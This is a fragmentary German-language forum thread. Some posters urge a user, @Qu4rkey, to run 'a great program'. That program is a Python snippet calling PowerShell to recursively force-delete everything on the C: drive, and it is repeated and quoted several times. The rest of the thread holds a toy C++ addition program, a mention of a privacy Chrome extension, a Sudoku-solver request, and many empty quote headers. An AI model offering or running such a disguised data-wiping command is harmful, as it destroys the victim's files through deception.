@Qu4rkey
mach mal das, ist ein tolles Programm.
import subprocess
cmd = "cd C:\\; remove-item * -Force -Recurse; echo Meddl"
subprocess.run(["powershell", "-NoExit", cmd], shell=True)
@Qu4rkey
mach mal das, ist ein tolles Programm.
import subprocess
cmd = "cd C:\\; remove-item * -Force -Recurse; echo Meddl"
subprocess.run(["powershell", "-NoExit", cmd], shell=True)
Zitat von: RichterinWinkelmann
import subprocess
cmd = "cd C:\\; remove-item * -Force -Recurse; echo Meddl"
subprocess.run(["powershell", "-NoExit", cmd], shell=True)
Zitat von: ProfHase
Zitat von: ProfHase
#include <iostream>
using namespace std;
int add(int a, int b) {
int result = 0;
for(int i = 0; i < a; ++i)
++result;
for(int i = 0; i < b; ++i)
++result;
return result;
}
int main()
{
std::cout << add(77,88) << std::endl;
return 0;
}
Nette Chrome-Extension, die Twitter, Youtube, Instagram Links umleitet zu den datenschutzfreundlicheren und weniger mit JS zugeschissenen Alternativen.
Zitat von: Throwaway123
Zitat von: Throwaway123
@Qu4rkey
Mach mal ein Programm das Sudokus löst oder so.
Zitat von: Beate
Zitat von: Hexley
Zitat von: Hexley
Zitat von: BigBANG